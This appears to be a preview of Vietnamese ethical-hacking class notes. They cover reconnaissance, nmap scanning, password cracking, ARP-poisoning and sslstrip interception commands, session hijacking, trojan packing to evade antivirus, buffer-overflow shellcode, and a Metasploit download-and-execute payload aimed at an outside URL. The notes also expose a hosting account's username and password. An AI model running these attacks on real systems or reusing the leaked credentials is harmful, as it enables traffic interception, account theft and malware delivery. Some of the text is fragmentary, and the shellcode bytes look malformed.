Tải bản đầy đủ (.docx) (50 trang)

Nghien cuu ve arp poinsoining

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (4.74 MB, 50 trang )

Ngày 12 tháng 7, năm 2015

Footprinting: tìm kiếm thông tin tổng quát của
công ty
IV: Khác
1. cách tìm thông tin email
C1: web công ty
C2: Tìm trên mạng
C3: Đoán và gửi mail thử
C4: sử dụng tool
thông tin về ip: IPnetinfo
tìm thông tin về domain: spade.
tìm email sd tool web data extrator
2.Thông tin cá nhân
o
o

mạng xh
trang tìm việc..........

3.Search: Google.com,
o
o
o
o
o
o
o

vinamilk-wiki-inulr: không sử dụng trang có chữ wiki và tìm trang dựa
vào ulr


vinamik -wiki-intitle:( trang quan tri)
vinamik -wiki-intitle:( trang quan tri) site:vn tìm trang có đuôi .vn
ceh site:nhatnghe.com : tìm từ khóa ceh ở trang nhatnghe.com
filetype: pdf : tìm file có đuôi pdf or là filetype:sql
"index of" windows 8.1: tìm file download có từ khóa là win8.1
ghdb nhờ google tìm thông tin

sử dụng tool search diggity, or 13. Hacking Web Applications\- InClass
-\Acunetix9
tìm thông tin từ nhiều năm trước sử dụng trang web archive.org
file robots: không up lên mạng

SCANNING
I.


protocols:
Cài ( nmap, wireshark)


1. ICMP
Một packet lớn tối đa 2^16 bytes, tcp chiếm 20 bytes, ip 20bytes, được chia ra
các frame mỗi frame có 15000 bytes
Ping không cần chia nhỏ dữ liệu ở lớp tcp vì gói tin nhỏ không cần gắn số thứ tự ở
lớp tcp.
Packet ở gói tin ICMP có 2 lớp là IP và link( gói ICMP có 8 bytes chính+ n bytes
data)
2. IP
• chức năng định tuyến
• Cấu trúc

+ 20 bytes
+ soune address và dest address: địa chỉ 8 bytes
+ protocol dùng để nhận ra giao thức đằng sau lớp IP
+ TTL lớn hơn 30 và khi tới nơi không được bằng 0 có quyền hủy gói
tin
+ Khi máy nhận không xử lý được 1 protocol thì nó sẽ trả lại bằng
cách tạo gói Icmp type 3 code 2
3.TCP
chức năng sắp xếp
Cấu trúc: 20 bytes
sequence number: đánh số thứ tự gói tin
acknowledgment numeber
Port


3 way handshake là quá trình test port
syn

A------------------------------------------------->B
SYN+ ACK
<------------------------------------------------ACK
--------------------------------------------------------->
Port: Open
<--------------------------------------------------------SYN
----------------------------->
RST


<----------------------------Port: Close


Khi gửi test lần đầu thì sn lấy ngẩu nhiên

4.UDP
• KHông kiểm tra
• Không kiểm tra 3 bước
• Khi không sử lý được thì gửi trả về gói ICMP type 3 code 3
II. Scanning

1. IP Protocol
sử dụng phần mềm wireshark.
cách filter: ip.addr== <địa chỉ ip>.



tạo các gói với protocol khác nhau
trả: ICMP type 3 code 2.

sử dụng nmap để tạo gói test: với cú pháp như sau:
nmap -sO <target>



2.

IP/hostname:192.168.111.50
subnet: 192.168.111.0/24
Range:192.168.111.1-10
UDP Port: (10^16=65536)

Tạo gói với port khác nhau

--> trả : ICMP type 3 code 3
Nmap -sU < tagert> hoặc -reason
-p
123,124
3.TCP Port (2^16)
3.1 TCP connect
xem bắt tay 3 bước của tcp
nmap -sT <tagert>
3.2. SYN Scan
nmap -sS
3.3 Null scan ( Không dùng cờ)


no-reponse : open
RST : close
đúng đối với hệ thống không phải windows, nên windows không làm
cách này được
3.4 Fin scan ( dùng cờ F)
như 3.3
3.5 Xmas (f,p,v)
3.6 Idle Scan

HIDE IP
I. Proxy
1. Http proxy

A <--------------------------->C<------------------------->B
http proxy




protocol: http, ftp
port : 8080, 8000,3128,80

xem ip />web proxy free
2.socks proxy

A <--------------------------->C<------------------------->B
socks proxy






protocol: all
port : 1080
chạy được tất cả giao thức
cơ chế làm việc khác thuộc lớp transport không
quan tâm giao thức khi client yêu cầu kết nối
phải cấu hình trên ứng dụng support socks, nên có
thêm phần mềm chạy socks lấy ứng dụng chạy
socks, vì nhiều phần mềm không chạy socks




F:\04. Enumeration\- InClass - \-Hide IP-\sockscap.zip

II. anonymizer

• Protocol: http
• port: 80




III.




VPN
protocol: all
Port:1723, 443, L2TP
vào trang flyvpn.com để sử dụng vpn free 20 phút cho 3 lần kết nối,
download phần mềm về sd
IV. Remote desktop
tool :
1. http proxy: ultrasurf thì biến máy tính mình làm web proxy
2. sock proxy: Tor
3. Hotsprtshield

SYSTEM HACKING
Module 5:
1.
2.
3.
I.



ophcrack ( rainbow) bỏ download
LC6 setup
Ca_setup( module 4)
Offline Password cracking
Mật khẩu: phải được lưu lại trong hệ thống, bị can thiệp vật lý dễ bị
mất mật khẩu,

VD: windown, windows/system32/config/Sam
Linux: etc/Password
Web: table





Sử dụng giải thuật tóm tắt, hash băm, nếu thay đổi một xíu dữ liệu gốc thì
dữ liệu tóm tắt sẽ bị thay đổi, cất được mật khẩu nhưng không suy ngược
lại được( một chiều), chủ yếu dùng kiểm tra dữ liệu
G
Bảo vệ: hash, sử dụng giải thuật H(P)=h với mã băm là 128 bit
Crack: Dò mã băm, Vd: 13 ký tự số: 10^13 mà máy tính sử lý được
100.000 hash/s ---> 3 năm để dò ra mã băm

để rút ngắn thời gian thì người ta lưu mã băm rồi dò sau, ( tuy nhiên dữ liệu mã
băm này rất lớn) nên băm ra nhiều lần, H(P1)--> h1--------> h100-------> h200 : là
cách lưu rainbow table
Giải thuật băm: Đối với web, linux: MD5, SHA, HMAC..........
Đối với window, LM, NTLM
Thực hành:



băm để lấy table

hoặc lên trang này để download về,
/>

phải copy nguyen folder và window mã hóa, nên mình phải giải mã
dò mã băm



Phải có file Sam và table sử dụng tool của microsoft để kiểm tra mã md5 hoặc
sha
/>

II.Online Pasword cracking
Dựng thử một server fpt để hacking online vì không chạm được vô vật lý,
không có mã băm,
sử Dụng các tools: gửi user và pass để chứng thực
Bruter


Brutus
HYdra

SNIFFERS

1.
2.
3.

I.

Chuẩn bị
wireshark(8)
Casetup(4)
SMBsnif
Tổng quản

Khai thác hạ tầng,
Bắt dữ liệu trên hạ tầng mạng, router, swith, hub, phương thức chủ động
TH1: Pasive




đị vào hệ thống broacast: Hub, wireless
người quản trị mạng, quản trị hệ thộng trực tiếp khai thác
Bắt gói tin trong quá trình tuyền dẫn----> lấy thông tin




Các phương thức bắt

Những phương thức trên là thụ động( ngồi chơi cũng có dữ liệu) Pasive
TH2: Active





Cách 1: Sử dung giao thức ARP poison, khi gói ARP hỏi là gói
broacast gửi lên toàn mạng, nhưng ARP trả lời là unicast chỉ trả lời
cho mac A
Cách 2: Mac flooding( làm tràng bộ nhớ SW để chuyển sang chế độ
HUB)

cần driver:
winpcap đối với windows nhưng không tưởng thích đối với card
mạng không dây.

còn linux là libcap để bắt gói tin khi không đúng địa chỉ mac vì đối
với các hệ điều hành sẽ không nhận gói tin khi không đúng địa chỉ
mac
II. Snif
1. Không mã hóa


Để sử dụng flooding thì dùng F:\08. Sniffing\- InClass -\etherflood để làm
treo SW

các tools trên linux:


asppoof
atttercap
Sủa dữ liệu
2. Có mã hóa
* Các giải thuật mã hóa
A. Symmetric ( secret key) : 1 key
VD: DES, 3DES, AES

Ưu: nhanh
Khuyết: phân phối key
B. asymmetric ( pulic key) 2 key là một bộ key được tạo ra bằng giải thuật
VD: RSA( được dùng phổ biến hiện nay)
ưu: phân phối key
Khuyết: Chậm


Cách 1: Tạo key giả ( fake certificate)

VD: RDP
---> Để bảo mật thì ta dùng CA dùng để xác thực, chữ ký điện tử( để xem danh
sách certificate run gõ certmgr.msc)

Tìm hiểu chữ ký số: sign
A kiểm tra thông tin
B1: kiểm tra mã hash
B2: kiểm tra CA uy tín hay không
B3: kiểm tra infomation của B đúng không
B4: thời gian của cer còn thời hạn hay không


Cách 2: ( https)

1:

A--------------http---------> B

2:


----------redirect https----->

3:

----------repuest------------->

4:

----------certificate-------->

Chặn ở bước 4 or chặn request https trả về cho client http, lúc này
hacker làm proxy



echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
<listenPort> ////// tao web proxy http
arpspoof -i <interface> -t <targetIP> <gatewayIP>
sslstrip -w sslstrip.log -l <listenPort>
sslstrip.log
cat sslstrip.log

////// ghi user va pass vo file

/// doc file ssltrip

SESSION HIJACKING
I. Network
II. application ( http)


client ----------------------> web server
B1. Client

//// dau doc vitim


Đăng nhập : me.zing.vn
B2: hacker
1.
2.
3.
4.

arp poisonig
Snif cookie
add cookie
logon
fillter: http.host contains zing.vn

=========>


để chống quá trình snif (thì chống được session) cách tốt nhất là mã
hóa dữ liệu : Mã hóa + CA + kiểm tra certificate
+ : C1: SSL: https: Pop3S
+: C2: IPsec
+ C3: VPN có mã hóa trước




Set mac tỉnh ( khuyết điểm là giải quyết được 1 chiều

++ Security Physical
1. Tạo nhiều tài khoản
2. Mã hóa lưu trữ
• win: Bitlocker.......

REVERSE ENGINEERING
I.

Tổng quan

/>
I.

Phân tích mã

Cách 1. Tìm mã theo chuỗi ( string)
ollydbg,
Xem tác động vào hệ thống: process monitor


xem lai ngôn ngữ lập trình assemller




xử dụng phần mềm 010edit để xem mã lệnh dạng hex và dùng
chương trình path mã lệnh vào chương trình

dùng cygwin viết code assamller, chạy tool linux trên nền windows
F:\05. System Hacking\- InClass -\cygwin

TROJAN
Chuẩn bị
Đăng ký hosting free: vd:
thông tin account: user:a1861401
pass: kienduc123

thanhan.16mb.com

Cài đặt
1. Long.nhatnghe.vn/ceh

autoit
2.onefileexe maker (6)
I.

Tông quan

Đưa đoạn mã tấn công vào hệ thông đích nhờ vào chính người dùng,
2 Bước
1. Xây dựng ứng dụng khai thác:
• Remote access: sử dụng server trung gian để điều khiển victim và

hacker cùng lên server để làm việc
Hacker--> server<--------victim
http
FTP
Proxy:

Dos : Dùng một nhóm đối tượng tất công vào một hệ thông nhằm
làm treo hệ thống
2. Dụ người ta thực thi ( đính kèm file thực thi vào chương trình để
victim tự cài ) gọi là
• exewrapper/Binder






Fake proxyam

lên forum nhatnghe lấy file index về luu trong ổ C:/




Đọc file index trong vong 2000ms tự động tắt




Chạy noteped trong vong 1000ms, send ra chữ hello, nhấn tổ hợp phím
ALT+FX


lên trang virustotal.com kiểm tra virut
Sử dụng upx để nén file exe --> nhỏ gọn, thay đổi mã gôc--> phần mềm
antivirut không phát hiện ( ngoài ra còn nhiều chương trình dùng để nén

VD: PEcompact)
Sử dụng detetor kiểm tra file có bị nén không

upx –d để giải nén


/>file cache dllcache
đống gói thành 1 file .exe F:\06. Trojans and Backdoors\- InClass \OneFileExeMaker
seach exe wrapper source code
exe binder cource code –java
sử dụng bộ 4 tool để giám sát chương trình hoạt động
wireshare,
auturuns, F:\06. Trojans and Backdoors\- InClass - \- Sandbox -\Autoruns.zip
msconfig,
Currport F:\06. Trojans and Backdoors\- InClass - \- Sandbox -\cports.zip

BUFFER OVERFLOW


Chuẩn bị :


1.Giải nén : Buferoverflow.2ip (5) ra ổ C gốc
2.Cài: C++ ( orther)
3.Cài : Cyywin

I.




Tổng quan
Lưu ý khi mở file exel, hay word là file thực thi hay word
Không có chuyện đính kèm trojan vào hình để chạy khi mở hình

B1: Viết Chương trình( ứng dụng) ---> Bước 2: Biên Dịch ----> B3: Thực thi
( Tìm hiểu hoạt động, cấu tạo của Ram)
file tập trung chứa file API: Kernel32.dll, user32.dll

HÌnh


0

Tấn công tràn bộ đệm
II.Khai thác:
Dữ liệu = Shellcode +return ( ESP)
+ Nhập tay
+ Qua mạng ( send Request)
+ Qua file

+ Shellcode: Exit windowsEX ( tìm hàm này nằm vị trí nào trong Ram)
B1: Tra đ/c API cmd arwin.exe user32.dll ExitWindowsEx ( Unit X, Dword Y)
B2: Viết code

Xor EAX, EAX
Push EAX (ebx)
Push EAX
Xor ebx, ebx



mov ebx, 0x77d89e6d
call ebx

B3: Biên dịch

$ nasm -f elf tatmay.asm
ld -o tatmay tatmay.o
objdump -d tatmay
\x31\xc0\x50\x50\x31\xdb\xbb\x6d\x9e\xd8\x77\xf\xd3

Viết shell tạo user trên máy tính
WinExec( string S, int)
Hàm ExitProccess dùng để thoát chương trình
--> Mov EBX, địa chỉ hàm ExitProccess
Call EBX
Có 4 thanh ghi tạm là EAX, EBX, ECX, EDX



+ Tool: Metaspoit



Win : framework 3.2
Linux: Kali

Máy tính bị nhiễm thì tràn Stack

msfconsole
use exploits/multi/browser/jave_signad_applet

set payload windows/download_exec
show options
set url htp://inrongvang.com.vn/calc.exe
set urvport 80
set uripath /
exploit

Phát hiện tràng bộ đệm


Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Tải bản đầy đủ ngay
×